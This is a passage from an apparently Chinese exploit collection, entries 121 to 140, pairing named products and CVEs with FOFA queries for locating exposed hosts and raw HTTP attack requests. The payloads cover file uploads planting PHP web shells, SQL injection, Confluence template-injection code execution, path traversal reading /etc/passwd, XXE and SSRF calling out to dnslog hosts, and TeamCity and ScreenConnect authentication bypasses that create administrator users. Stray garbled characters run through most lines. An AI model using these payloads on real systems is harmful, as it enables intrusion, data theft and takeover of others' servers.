) @( R8 I/ [" B" P: w/ GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 }, |. V1 S+ I& u2 S; c7 F. h
Accept-Encoding: gzip, deflate
. E& b- c: M) A& @* yContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% T* L$ O4 ^; d& {4 qContent-Length: 597
% J$ K+ T: l! xOrigin: https://ip:port
- E5 `9 u, O0 P8 MReferer: https://ip:port/sysmanage/licence.php
$ a3 r- \9 w; r% m) `5 ]( `& m8 nUpgrade-Insecure-Requests: 13 h+ ^( i$ N& L$ H
Sec-Fetch-Dest: document" X# V7 e: L9 w* E" Z& H7 |
Sec-Fetch-Mode: navigate
( e: V, U! E3 S7 I7 t! ]' OSec-Fetch-Site: same-origin
( y3 I p; b# ?3 X' cSec-Fetch-User: ?1. c) l4 x) Y- N+ X6 B6 u6 u; z
Te: trailers6 @* D2 ]5 r8 S5 ^: ?8 G2 a/ Z
Connection: close
" X H! D' A9 v2 f5 K/ w: @% A9 Z: Y& K9 p2 |
-----------------------------42328904123665875270630079328
6 r/ y: J, h. l; H YContent-Disposition: form-data; name="file_upload"; filename="2.php"
. S1 m0 H6 J" ~' v9 y8 H1 ]( vContent-Type: application/octet-stream
8 s. R3 `8 J- k4 ^ S0 R
0 g1 H. p5 w& }1 Y& }<?php phpinfo()?>6 v" _2 `, c. V# x
-----------------------------42328904123665875270630079328% Z) c8 K* b& L: s0 d& q" H
Content-Disposition: form-data; name="id_type"
8 m5 M4 w7 u6 O ^4 }$ u" N+ ~+ |+ M2 @: k" r R, [- v5 a
1! G( I4 D0 V$ {* @, W0 W- H% W. x( e
-----------------------------42328904123665875270630079328- N0 D2 H5 c; W0 f
Content-Disposition: form-data; name="1_ck"1 k7 D8 T% p" S8 L, q% b9 l
7 ]3 j; x m9 l/ a1_radhttp4 K$ K1 C* U# n* c$ k
-----------------------------42328904123665875270630079328
$ F8 @& Y3 _+ l NContent-Disposition: form-data; name="mode"
4 l! U. c/ S5 @# Z# ]3 F9 r8 @- z2 N( {/ G
import x# |7 k6 w; y! w
-----------------------------42328904123665875270630079328! z3 U9 }% C* p) a
$ q% l! w! Y0 L, K+ K
M; t8 q% [, k9 W: T" W3 T5 h文件路径/upload/2.php
& Q; J0 F% }; @9 E( E( F4 ~3 N
- k, ~1 f1 A" L2 `1 c121. 北京百绰智能S42管理平台userattestation.php任意文件上传: O( D( e# Y- f0 b+ b
CVE-2024-1918
# {# D# m6 V* L, }( j! l2 aFOFA:title="Smart管理平台"
, r7 m% ]. T4 D- g. Q& F3 TPOST /useratte/userattestation.php HTTP/1.1
# K" V9 q4 d3 s4 A2 b, EHost: 192.168.40.130:8443# d# M3 H: ]- `2 ^/ N* p, n% h2 {
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
8 z! A- z$ \9 {- O6 yUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko6 O4 @) p9 H( l/ Q" M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' K5 C5 y$ r1 B4 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ ~- C0 q! I0 R) J' c- c) n
Accept-Encoding: gzip, deflate/ l- S& P+ Q. ~1 O' C% k- W
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
8 x" U1 N, W2 j- F. `, O) f- x1 a- I6 h6 tContent-Length: 592
6 U( V4 o- F8 d2 f* }7 Q4 z! hOrigin: https://192.168.40.130:8443 ~' ~$ a. o2 }1 y% ]1 G
Upgrade-Insecure-Requests: 1
$ D. `5 O& \3 o* X( m9 `9 w9 QSec-Fetch-Dest: document
; k2 [8 D$ z! [' X" E+ ~Sec-Fetch-Mode: navigate
$ j9 \4 T9 q7 HSec-Fetch-Site: same-origin9 U4 D: | r0 u: t
Sec-Fetch-User: ?1
0 V1 _4 X; N2 s7 X$ r! STe: trailers
5 a. r8 O& T3 ^Connection: close
; B3 d& \. t+ M2 @; q! _- c# s# `2 `2 z r
-----------------------------42328904123665875270630079328
: E' Z2 N+ o) O% u6 OContent-Disposition: form-data; name="web_img"; filename="1.php"
( I1 g' e+ I Z& M9 o W: dContent-Type: application/octet-stream. S) L1 f) y+ K9 Z* w
6 b+ I2 I: a X8 d4 Y<?php phpinfo();?>: U% t. b7 R' K O1 o4 z
-----------------------------42328904123665875270630079328
0 a# G$ k( y9 b F4 YContent-Disposition: form-data; name="id_type", G& r' q3 b( b4 D
4 b3 m# G+ Y/ n' Y! `$ `7 G U1
9 E% y' Z/ _: X1 {* Q-----------------------------42328904123665875270630079328, w3 _5 v# ?; |. M" n. a9 e: X1 x
Content-Disposition: form-data; name="1_ck"
; n! Y+ k7 C3 Y4 X: E) [5 r& Y* d! E4 j d4 b
1_radhttp3 V2 P1 Z# T5 J9 M
-----------------------------42328904123665875270630079328
0 ` G, }& T* r+ B' I/ k# EContent-Disposition: form-data; name="hidwel"
2 b+ u2 o- P, ?/ n/ l9 I, n$ `9 [. o8 q, X$ `
set# [% g) n4 O) N0 S# a; E
-----------------------------42328904123665875270630079328
; X) q" @7 g8 k f; ?1 x5 a, E# T0 M6 k4 o) i9 x8 R0 u$ U* I
& W5 ]' Q0 A; f" iboot/web/upload/weblogo/1.php! T% G6 u* W' {
i( q* R: L' f3 Y) U. L0 w& ~8 _
122. 北京百绰智能s200管理平台/importexport.php sql注入
2 t( x0 z/ h3 t NCVE-2024-27718FOFA:title="Smart管理平台"
/ G% p+ r9 }: R9 `+ F其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
- z1 D% g/ w2 m: _" |* v- xGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1. F" v2 W& z- r* r8 L. B: s! |5 P
Host: x.x.x.x* M& Q& k0 W: r, z% ~3 s# `
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
/ @8 C" c9 s* D& FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 @ X6 t# W2 Z/ B2 a4 W) l |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
k1 h( r1 D' j3 r: VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% V- Y- z/ O3 \5 p- D- b
Accept-Encoding: gzip, deflate, br9 K* S, \( M( V: A2 z
Upgrade-Insecure-Requests: 1% @/ r1 k9 k: z) `: T; ]
Sec-Fetch-Dest: document
7 W$ y+ V' F/ hSec-Fetch-Mode: navigate3 d' H& X7 G0 H8 f+ @
Sec-Fetch-Site: none
- q$ d( o3 k3 H( k [, PSec-Fetch-User: ?1
+ _" X. Y+ N d- x/ m& T$ }Te: trailers
- H# A2 N7 a1 V! _& n% D# AConnection: close1 O. C; i c# _+ \4 J" p
3 d+ F" @; g! v
& o4 O! }' A, o. ]
123. Atlassian Confluence 模板注入代码执行' x, i" o- f2 ?: b: _! U: x. Z
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
& }; M- J. ?! \' tPOST /template/aui/text-inline.vm HTTP/1.1
% i" y( w; j- a3 }0 dHost: localhost:80900 v+ L7 b* Y$ o4 F
Accept-Encoding: gzip, deflate, br* L; N( ?0 e [2 k
Accept: */*
. |+ J) J, }' e9 U, uAccept-Language: en-US;q=0.9,en;q=0.87 `, ~: x* U. N% N: W4 o* B5 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36" K+ v; H; T8 P5 ?+ E( ~. `1 s
Connection: close1 C5 `3 }2 p8 x" Y
Content-Type: application/x-www-form-urlencoded& K, Z4 ~% I( ^* V# e1 ?2 d
) q8 U- M5 D7 Q2 clabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))$ R4 ~' i8 Q* l" b+ i4 H# ^* O M
! {8 t) D2 ~- y$ S( Z
8 ]9 H# L; q% L! O1 ?124. 湖南建研工程质量检测系统任意文件上传
9 I, x8 z" D/ I0 D. u" D3 J1 JFOFA:body="/Content/Theme/Standard/webSite/login.css"
" `: s8 }" A# @5 ~- d5 NPOST /Scripts/admintool?type=updatefile HTTP/1.1
5 D) s$ t2 T% G. T4 ?Host: 192.168.40.130:8282
- C. B4 o/ T/ i8 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.368 v" K' @- x' h
Content-Length: 72
0 J$ H# c& I" w) C" A/ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.87 \8 k8 ^, }7 J; X& f# v0 B. _
Accept-Encoding: gzip, deflate, br
# I& x3 }- R1 q( xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 A% E. H1 s, X4 H4 t$ \& }Connection: close6 H7 w$ d: @ i/ F+ f$ j3 @
Content-Type: application/x-www-form-urlencoded
- F$ X' I; d4 p. Z4 ~: L, d5 Q
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
9 T3 K8 k) x) D4 |# U, d$ p( N8 ?" D9 Z9 J# Z) Z# w
5 u0 \& X d S
http://192.168.40.130:8282/Scripts/abcgcg.aspx [8 C8 F& t9 U! W/ D# t
7 `* Z6 s C/ z3 ]2 }1 |125. ConnectWise ScreenConnect身份验证绕过$ }4 c& v. g( p" z) ]
CVE-2024-1709
7 l* X7 C* @3 \! F" O) SFOFA:icon_hash="-82958153"
, P, m' Q( A2 D7 M! J( ^& ^) } zhttps://github.com/watchtowrlabs ... bypass-add-user-poc* r8 O8 o0 ?: x& n5 T/ V
$ H$ g2 ]9 @* a) q1 o
5 {+ G& H$ P0 [$ x3 V7 I4 @1 B
使用方法' f% B8 g( [: e1 P% ]1 b; V
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!( ^3 E+ I( r0 C# q, M
7 M% u0 Q, {' T2 P+ y# s& S- ~& I+ @: A/ s. p
创建好用户后直接登录后台,可以执行系统命令。
. i) @1 P: n$ [( P9 F; ^/ z, _8 }- [# B ~4 x
126. Aiohttp 路径遍历3 D. _. D( T8 W' W
FOFA:title=="ComfyUI"
+ o0 O9 ]- s) c( o' rGET /static/../../../../../etc/passwd HTTP/1.1
' X1 V( d: l3 `5 P$ bHost: x.x.x.x. \/ P1 z# J, E. {. Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# [' b9 N4 u. v* ]: p& y* zConnection: close. r: G% o6 d9 A
Accept: */*
: M3 M2 h% h9 b4 ?+ e5 D! L7 TAccept-Language: en* ?$ T* F/ j2 B* X1 X
Accept-Encoding: gzip7 {5 O. H" {$ T' T; o$ u
9 u- _4 D4 ]; I: V. @/ z. M% ?5 r
4 p* N6 j8 E1 c127. 广联达Linkworks DataExchange.ashx XXE
! v& N. o. V7 K( n- EFOFA:body="Services/Identification/login.ashx"
+ y. N' Z* d4 s `POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1! F$ I3 [0 ~) r( {
Host: 192.168.40.130:8888
; ? j2 O: L u7 x+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
9 F; D+ P4 u% H4 I1 F/ {Content-Length: 4154 h7 h- o( S: b9 M) ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# f8 G0 T8 i: z: DAccept-Encoding: gzip, deflate, f# ]( h7 k, Z4 A
Accept-Language: zh-CN,zh;q=0.9
3 P3 E& ^/ G. z" [' ~5 wConnection: close
6 H6 e) `# `8 b' X7 _Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0( e' ` ~5 X1 h; I1 O0 Q
Purpose: prefetch% ?6 h* q* I4 h7 u( \
Sec-Purpose: prefetch;prerender
. N( v5 |# g$ b2 |0 W: ?' W: }& g7 w3 l6 B1 h2 {. G
------WebKitFormBoundaryJGgV5l5ta05yAIe0
' E% j6 A. Y( H: G j! g) I% X3 X4 v. YContent-Disposition: form-data;name="SystemName"
4 A* f$ s3 t: F* h4 m: Q- o
# q u4 }6 d9 q- a3 a& V3 \7 N5 y, ^BIM4 ^9 m7 C* i T5 k' V
------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 j5 P: r# Z" M* z& Y) s9 aContent-Disposition: form-data;name="Params"! v4 A/ A: W" W8 M% T
Content-Type: text/plain
8 w2 }$ J/ G; ~
& \ m; D9 L8 I# m# V/ |<?xml version="1.0" encoding="UTF-8"?>
' g# J& S% Y4 W& F* f7 ]+ j<!DOCTYPE test [. m* t3 T: Y4 ~( ~
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">! a& i. ?: }' m+ f
]' f2 X0 B/ ] X
>/ C( }1 }* {0 j% X% l. i' _
<test>&t;</test>& V) Y0 Z; |. s& q
------WebKitFormBoundaryJGgV5l5ta05yAIe0--: {: ]3 [8 f. e3 ^$ Z' x7 S
9 n2 J- Y1 ?; f, F+ J2 t/ `; a& r/ @) w7 l2 v- P/ C% a
+ M. D2 @( ]+ A' L9 ~" p4 e128. Adobe ColdFusion 反序列化7 h& O# }% N9 g6 c C
CVE-2023-38203
0 G2 i ]: D: I2 m" TAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
0 o4 i& _" G1 y9 s2 t; ^) j6 g7 DFOFA:app="Adobe-ColdFusion". Y7 B6 F O7 H X; A( X
PAYLOAD
$ P& _2 W* C4 M3 K2 ~: w8 m1 Z1 @9 X8 q, ~ i
129. Adobe ColdFusion 任意文件读取! w" U* J8 [: u4 w/ z/ K- L) J
CVE-2024-20767
1 k# M/ X& Y. ?( Z/ EFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
+ I+ G" T8 D$ I3 e4 `( p第一步,获取uuid2 s( c. `5 _ C8 M
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.11 w. Q/ N- Y0 D! @+ V
Host: x.x.x.x
% B) O) c6 S7 F, R" B. }2 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* e7 W; |' {( c% i/ }2 q0 e4 l
Accept: */* u; Q! p* Q m$ |7 |" `+ l6 q
Accept-Encoding: gzip, deflate
/ h8 p+ w+ u# WConnection: close: Q: P- ]6 T* n
" y3 ]- L5 L1 k' e5 Q& @& d
( i1 l M, N; v8 t8 F# |第二步,读取/etc/passwd文件5 `$ [' k( O' S0 E
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
) Q( C o2 f4 qHost: x.x.x.x4 ?, F% |( G; J+ r! D" K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; N2 ?( X# l: f/ v- F8 KAccept: */*' q3 _! |5 y% E, g. o* p! A
Accept-Encoding: gzip, deflate1 s) N: R$ R. \( L/ S/ v
Connection: close
6 L! G/ I5 {. z# ?. m, T i) t- Duuid: 85f60018-a654-4410-a783-f81cbd5000b96 ?* d4 O2 U+ U6 k A1 O- R
% X; J# h# N: w6 W( {: D1 z0 `, M
5 d! n; N) i7 D; o" {130. Laykefu客服系统任意文件上传0 W3 w& Z0 G+ j- A1 R
FOFA:icon_hash="-334624619"
2 g! V0 Y+ ?% zPOST /admin/users/upavatar.html HTTP/1.1! P; r# B- C4 V0 V
Host: 127.0.0.1
# j' D8 x: b, w; I- ]Accept: application/json, text/javascript, */*; q=0.013 F- h4 P! \2 F& S
X-Requested-With: XMLHttpRequest$ e) _! @& [& l; Z! C( r
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
1 J g$ f2 ]4 LContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR8 {- I9 O+ W. [$ [3 \2 P
Accept-Encoding: gzip, deflate
1 _) I& T O; D8 v7 w' Q% Z7 MAccept-Language: zh-CN,zh;q=0.9; V5 r% B9 j: k- \
Cookie: user_name=1; user_id=36 x3 s! F% @9 c ]: K0 k9 O
Connection: close
+ M5 d3 k9 \, u$ b$ a0 f* d h
- p' }, R3 i! ]7 K1 z: E* k# Y------WebKitFormBoundary3OCVBiwBVsNuB2kR' [- V& u. C0 z) A9 x; z" J- K, W
Content-Disposition: form-data; name="file"; filename="1.php"% r7 \' c0 G, e/ J0 w
Content-Type: image/png
& C. T# y1 K& S3 ]: s4 A% U" O+ A
5 [1 Q$ X2 z9 I/ R. q<?php phpinfo();@eval($_POST['sec']);?># t" V) X5 {1 X+ _. R
------WebKitFormBoundary3OCVBiwBVsNuB2kR--0 M: l: u/ [& x4 {) i
& W( U9 Y% d( }! `, V. D! T/ s- E
1 A, E$ M5 v9 P; L2 H' ^* B+ ^131. Mini-Tmall <=20231017 SQL注入
% |+ X% ^& B6 I" ~' \1 k5 `2 RFOFA:icon_hash="-2087517259"
) {. l) _8 l( C9 h0 b2 K9 l5 p3 X, O后台地址:http://localhost:8080/tmall/admin
# T0 z% ~9 C' _; mhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
* }1 e. L# r7 ?0 f! u+ @8 d9 K7 q+ s
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过" X3 J3 _( }* U& \3 b6 P$ k" ^0 A
CVE-2024-27198
. e$ ~9 b9 e/ w0 S( O. PFOFA:body="Log in to TeamCity"
. E3 z' j A3 W' S" K* ?% ePOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" t1 d$ O. F+ _! k+ S# b
Host: 192.168.40.130:8111
3 q# O6 r5 W5 K% |+ r PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 Q9 M0 R; v" o. l, x" j, LAccept: */*
% s( g# H3 @! ^7 e4 ?+ y9 P; qContent-Type: application/json
2 Q- B( q; d L5 G- SAccept-Encoding: gzip, deflate
# b# \, \3 g3 d# m; R8 T, a$ L( u2 M4 `4 D7 F( b& _+ X2 d8 o# l# s4 u' g
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
% _5 ~3 b1 j; S; G8 w" t% D, d2 w8 X2 s
2 u' Y6 f7 q1 d: o+ QCVE-2024-271998 Q/ O6 E3 L3 p* K+ U, v; i
/res/../admin/diagnostic.jsp* v) r9 A* x4 E
/.well-known/acme-challenge/../../admin/diagnostic.jsp' z5 H i9 g0 U* L* m; y; Q
/update/../admin/diagnostic.jsp
( Q( w! \! Y) E: S% b, h- u4 x0 j$ X9 K- X; V
0 |5 {. A+ i* w/ J$ k0 R. p" Z
CVE-2024-27198-RCE.py, H# u0 `- t1 @0 s7 e
+ o3 T2 N* E" |3 p- |) @* }0 X133. H5 云商城 file.php 文件上传
8 S0 T% f: M0 X3 U- rFOFA:body="/public/qbsp.php"+ I5 ^# M7 W3 e, _% d0 Z* i4 U
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
$ m$ k0 Q3 r( z* U; g/ u( q3 B# w0 DHost: your-ip. s4 k1 ]0 T% ^2 [& Z1 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 X+ }0 D7 h. V2 D0 p, F! M' }Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx" o" ]* i* G7 T. y4 g$ g- _
+ m2 ^. }, A; C; d. c------WebKitFormBoundaryFQqYtrIWb8iBxUCx
4 y% o; j8 k' {Content-Disposition: form-data; name="file"; filename="rce.php"
- p. h& Q4 o$ j7 u8 ?, c5 D- f- uContent-Type: application/octet-stream4 Z# J R+ U# r ]1 u
4 F' V& R4 E/ n$ _6 q0 K. `<?php system("cat /etc/passwd");unlink(__FILE__);?>! l" q; \0 { P. H
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
~+ P$ H/ f; L! l% Q
A4 Y* }' a2 U
1 f. {! s0 @" I6 J: m1 F# b8 F' ^% o+ B
134. 网康NS-ASG应用安全网关index.php sql注入 J4 Q7 e R* ^
CVE-2024-2330
8 o$ ~9 @, j. x J. ?; O& qNetentsec NS-ASG Application Security Gateway 6.3版本
; b0 X) D4 l. d& A% ^6 GFOFA:app="网康科技-NS-ASG安全网关"
! ^% Z8 f' [8 R) }# M* KPOST /protocol/index.php HTTP/1.11 E' W0 \% d# y( b# N: Z- ?/ y* p
Host: x.x.x.x
( F, N. }, h; M) f+ @/ yCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de; C' U/ W" v2 t! h5 ]: g) c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.09 U* I# d' r6 ?; y
Accept: */*) G% X( e4 g2 U" m7 q2 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
{: N/ T; A& M' CAccept-Encoding: gzip, deflate
. N2 d) d$ ~8 fSec-Fetch-Dest: empty1 Y$ I) q0 ~, f8 z4 {6 L
Sec-Fetch-Mode: cors
3 d+ f* V. x/ C# e2 a. sSec-Fetch-Site: same-origin1 s" ?) Q. S4 t" B! w% H: z
Te: trailers
/ `1 t+ a" r1 W0 |Connection: close
, _) I8 K/ ]6 w5 `/ n' B }Content-Type: application/x-www-form-urlencoded
! @( B, m( d- A. \& F$ J3 }! tContent-Length: 263
- S; `7 f$ u! e: @8 P" Q$ e; e. w+ \5 F! F% ~( E$ b5 b
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
( ^' j7 ?+ N: P' `. b) h) {" m1 p- q2 l0 m
5 g* B5 y9 D4 q7 X% }- z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. L8 u, B" G# lCVE-2024-2022
( \' D! |7 |" S* k$ m7 INetentsec NS-ASG Application Security Gateway 6.3版本- K# Y' p1 I9 N& i& ^( O! S" I
FOFA:app="网康科技-NS-ASG安全网关"
9 C- w9 c, X. Z: ?7 F2 D4 bGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
1 x: x; Y; z2 ]# h. `Host: x.x.x.x
6 F* m' o- d9 Y. W, aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. W, c# M# Z& }; e* V+ h k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" `$ y7 O/ p9 D c3 Q' O5 G& f* x
Accept-Encoding: gzip, deflate
/ L0 v) W' I# N8 sAccept-Language: zh-CN,zh;q=0.9
$ W* O% m; L/ w8 d& a5 V8 f) @Connection: close
* _ q# J/ h% v* P1 q; X8 V( p0 U% ]
" r9 E* K C( W; F6 n136. NextChat cors SSRF1 ~+ ?' R/ |& j0 c) _" d- ?/ Z
CVE-2023-49785
6 X# D3 V/ d AFOFA:title="NextChat"4 F. o& [! a6 w, W0 G
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1; V: m; p! f* A- h6 E
Host: x.x.x.x:10000
' m$ r0 Y% H+ c2 k. c0 V9 DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: _6 k1 [; n' j$ i; m
Connection: close
5 X1 l& I: o! Y1 y% _Accept: */*% j. k, V9 _# ?7 k
Accept-Language: en
' g! p5 H" i: D3 K. ^Accept-Encoding: gzip% Q$ n* A: `" [/ X
9 @8 v5 Q1 `' F( l6 }8 j# j8 P
9 {0 C9 D- p! Q+ n2 G. ~
137. 福建科立迅通信指挥调度平台down_file.php sql注入/ v$ h* J' i/ S0 N
CVE-2024-2620
1 z& t" s* m, {) l: M4 l" f( P4 PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 {2 w! u2 Y! _$ ~GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1 f$ v& `( x+ l
Host: x.x.x.x- F# L2 w6 b9 Q) s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ o* ]* n5 j3 S4 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 b8 u4 r$ ^% MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ Q A& x5 y5 W7 l2 m9 KAccept-Encoding: gzip, deflate, br
! k6 f& g8 n; x: B1 G# W4 w1 e# W1 OConnection: close
, Z: O$ _: G8 m$ d c; w) ]- e! x. N, b2 qCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
- o6 k1 N- Y5 \8 S# j1 lUpgrade-Insecure-Requests: 1, ~9 w. @0 w- I3 L4 g# I# ], l
% \+ X0 A( P! G: m1 l g. U1 i! |) f N* U& P* [! c; x
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 k+ f' O$ o6 b
CVE-2024-2621' I+ ~8 W/ `- a9 N: U; d
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
) f t2 Q% @9 e2 v" DGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1& e. J; I, _$ q( l t! `/ S! j
Host: x.x.x.x
1 n3 K/ c; y7 e& sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 H- b+ t. I; E2 \+ V: X) nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! B+ I" c# U! J3 u e. N6 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% b; z5 \ n& o r2 L+ _3 V) {, yAccept-Encoding: gzip, deflate, br
: h, B/ P) j. [) l; d7 kConnection: close0 F+ O$ o( s$ Q: ^
Upgrade-Insecure-Requests: 1
' q- H4 t0 O7 N) Q
8 T. P7 H; \& E# h- k7 L$ l o6 Q% _0 H" S" V: f
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
6 U- C% _/ `+ R: N4 P3 q8 zCVE-2024-2622
; F! D8 n9 N; uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- G/ t9 l5 t6 V: {
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.11 x- F& {1 y8 g$ f( t# b& u! N
Host: x.x.x.x
+ i2 e- V4 [. @6 ~) X b) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ R: d8 N, _ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 A \! `# l* A8 Q; M* l) ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ~7 F) K; Y) m# N8 @/ YAccept-Encoding: gzip, deflate, br7 h2 j# U" o9 u2 a/ Y. t/ L
Connection: close2 D5 d. k) r( P1 e
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk; C% ^, t3 e! I3 j( M8 L' i0 @, S
Upgrade-Insecure-Requests: 12 K5 H( f1 e/ j2 W' i1 p0 B
8 Q2 X9 `! A! L# q# R
7 ~ p6 H9 R5 X3 p/ X8 ?% D140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
